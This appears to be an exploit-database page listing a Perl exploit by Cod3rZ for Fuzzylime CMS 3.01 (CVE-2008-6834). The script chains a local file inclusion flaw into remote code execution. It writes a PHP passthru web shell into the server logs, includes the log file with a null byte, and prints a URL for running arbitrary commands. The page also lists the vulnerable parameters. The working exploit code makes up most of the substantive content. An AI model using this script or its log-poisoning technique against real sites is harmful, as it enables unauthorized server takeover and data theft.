Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
fuzzylime cms 3.01a (file) Local File Inclusion Exploit
2009-06-24 / 2009-06-25
Credit:
Cod3rZ
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2008-6834
CWE:
CWE-22
Ogólna skala CVSS:
10/10
Znaczenie:
10/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Pełny
Wpływ na integralność:
Pełny
Wpływ na dostępność:
Pełny
#!/usr/bin/perl # ---------------------------------------------------------- # Fuzzylime CMS 3.01 Multiple LFI / RCE # author : Cod3rZ # website : http://cod3rz.helloweb.eu # ---------------------------------------------------------- # http://[site]/blog.php?file=../[file]\0 # http://[site]/code/newsheads.php?heads=../[file]\0 # post # http://[site]/code/commupdate.php (type=count&s=[file]\0) # ---------------------------------------------------------- # LFI to RCE: # ---------------------------------------------------------- use LWP::UserAgent; system("cls"); #system("clear"); print " -------------------------------------------------\n"; print " Fuzzylime CMS 3.01 LFI / RCE \n"; print " Powered by Cod3rZ \n"; print " http://cod3rz.helloweb.eu \n"; print " -------------------------------------------------\n"; print " Insert Site (http://site.com/): \n "; chomp($site = <STDIN>); print " -------------------------------------------------\n"; print " Insert Logs path \n "; chomp($path = <STDIN>); print " -------------------------------------------------\n"; #Infect Logs $lwp = LWP::UserAgent->new; $siten = $site.'/blog.php?file='; $ua = $lwp->get($site.'coderz <?php passthru(stripslashes($_GET[cmd])); ?> /coderz'); #Control $ua = $lwp->get($site.$path.'%00'); if($ua->content =~ m/cod3rz/) { print " Ok ".$site." is infected \n"; print " -------------------------------------------------\n"; print " ".$siten.$path."&cmd=[command]\\0 \n"; print " -------------------------------------------------\n"; }
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top